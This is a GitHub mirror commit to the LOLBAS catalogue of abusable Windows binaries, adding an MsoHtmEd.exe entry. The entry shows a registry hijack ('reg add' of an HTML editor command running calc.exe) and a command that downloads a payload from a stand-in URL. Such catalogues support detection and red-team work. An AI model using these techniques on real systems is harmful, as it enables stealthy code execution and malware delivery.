public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-02-26 20:13:42 +01:00
Code Issues Projects Releases Wiki Activity

Update MsoHtmEd.yml

Browse Source
This commit is contained in:
C-h4ck-0 2023-05-07 14:25:29 +07:00 committed by GitHub
parent 7e1d5162a9
commit 9dba4379d4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
yml/OtherMSBinaries/MsoHtmEd.yml
View File

@ -4,6 +4,13 @@ Description: Microsoft Office component
Author: Nir Chako Author: Nir Chako
Created: 2022-07-24 Created: 2022-07-24
Commands: Commands:
- Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
Description: Execute a command line from the registry
Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
- Command: MsoHtmEd.exe https://example.com/payload - Command: MsoHtmEd.exe https://example.com/payload
Description: Downloads payload from remote server Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)